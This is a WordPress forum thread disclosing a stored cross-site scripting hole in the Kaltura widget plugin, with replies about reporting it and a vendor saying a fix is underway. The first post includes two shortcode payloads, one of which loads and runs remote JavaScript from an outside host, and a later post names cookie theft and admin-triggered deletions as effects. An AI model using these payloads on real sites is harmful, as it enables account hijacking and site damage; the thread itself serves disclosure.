• I was playing with my friend's WordPress site looking for security vulnerabilities (a little hobby of mine), and I found that I can run any JavaScript code on his site by submitting a comment.

    Showing an alert:
    [kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]

    Running code from another server:
    [kaltura-widget wid='"); jQuery.getScript("https://somedomain.com/xss.js"); $("xxx' size="comments" /]

    I guess that it is a bug that should be fixed.

Viewing 8 replies - 1 through 8 (of 8 total)
  • Check out Submitting_Bugs for some guidance on how to get this in front of developers.

    Thanks!

    Thread Starter kdzwinel

    (@kdzwinel)

    Thanks for the reply. I don’t really have time to read 10 pages on how to submit a bug. Fortunately, I’ve found a link to trac and posted a new ticket. Hope this helps.

    You should try to contact the plugin author instead.

    I’ve tagged this topic so that it’s more likely to get seen by other users of the plugin.

    Thread Starter kdzwinel

    (@kdzwinel)

    Thanks for the reply. I’m sorry for all this mess, but I can’t figure out who is responsible for fixing this.

    On the kaltura site I’ve found ‘contact us’ and sent them a message, but kaltura looks like a big portal and the wordpress plugin is only one of 1000 things they are baking.

    Those who use this plugin must be warned, because it is a serious security hole. The injected JavaScript can be hidden in an innocent-looking post and do nasty things such as account hijacking (via cookie stealing), removing articles/posts (via calling delete actions when triggered by a logged-in admin), posting spam as a registered user/admin, screwing up the site’s look (by manipulating the DOM), etc. Comment moderation is no help; you should disable this plugin.

    It’s Kaltura’s responsibility, since they wrote the plugin to promote their service.

    Since it hasn’t been updated in over a year, I don’t think it’s high on their priority list.

    Hi,

    Definitely our responsibility – it’s already in the works. We are updating the plugin on this page.

    Any update on this? I looked at the plugin page linked above but it doesn’t look like an update has been issued.

    I’d like to use the kaltura service, but not if there are still security issues.

    Anyone currently using it without issues?

    This issue was fixed in the dev version.

  • The topic ‘kaltura-widget xss security error’ is closed to new replies.